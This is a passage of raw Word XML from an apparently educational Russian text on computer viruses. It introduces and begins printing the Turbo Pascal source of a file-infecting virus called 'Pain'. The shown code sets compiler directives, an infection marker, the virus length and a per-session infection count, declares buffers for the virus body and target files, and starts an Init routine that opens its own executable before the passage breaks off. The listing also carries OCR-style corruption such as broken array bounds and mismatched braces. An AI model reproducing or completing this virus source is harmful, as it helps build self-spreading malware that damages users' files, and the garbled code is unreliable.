        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>12. Завершить программу.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Ниже приведен пример листинга программы, заражающей файлы таким способом. </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{$М 2048, 0, 0} </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">{$А-} </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">{$В-} </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">{$D-} </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">{$Е+} </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">($F-) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">($G-} </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">($!-} </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">{$L-} </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">{$N-} </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">{$S-} / </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">{$V-} </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">{$X+} </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">{Используются модули DOS и System (модуль System автоматически </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>подключается к каждой программе при компиляции)}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Uses DOS; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Const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Имя</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вируса</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">VirName='Pain'; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">{Строка для проверки на повторное заражение. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Она дописывается в заражаемый файл сразу после кода вируса} </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">VirLabel: String[5]='Pain!1; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{Длина получаемого при компиляции ЕХЕ-файла}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">VirLen=4208; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Author='</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F04A"/>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{Количество заражаемых за один сеанс работы файлов}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">lnfCount=2; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Var </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{Массив для определения наличия копии вируса в найденном файле}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Virldentifier: Array [1.5] of Char; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{Файловая переменная для работы с файлами}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">VirBody: File; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Еще одна файловая переменная - хотя без нее можно было</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>обойтись, так будет понятнее)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Target: File; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{Для имени найденного файла)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">TargetFile: PathStr;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Буфер</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>для</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тела</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вируса</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VirBuf : Array [-I.VirLen] of Char; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(Для даты/времени файла)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Time : Longint; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(Счетчик количества инфицированных файлов)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">InfFiles : Byte; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Dirlnfo : SearchRec; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">LabelBuf : Array [1.5] of Char;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Инициализация</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procedure Init; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>begin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">LabelBuf [1]:=VirLabel[1]; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">LabelBuf[2]:=VirLabel[2]; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LabelBuf[3]:=VirLabel[3],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">LabelBuf[4]:=VirLabel[4]; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">LabelBuf[5]:=VirLabel[5]; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(Обнуляем счетчик количества инфицированных файлов}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">lnfFiles:=0; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(Связываем файловую переменную VirBody с именем программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>из которой стартовали)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Assign(VirBody, ParamStr(O)); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(Открываем файл с recsize=1 байту)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
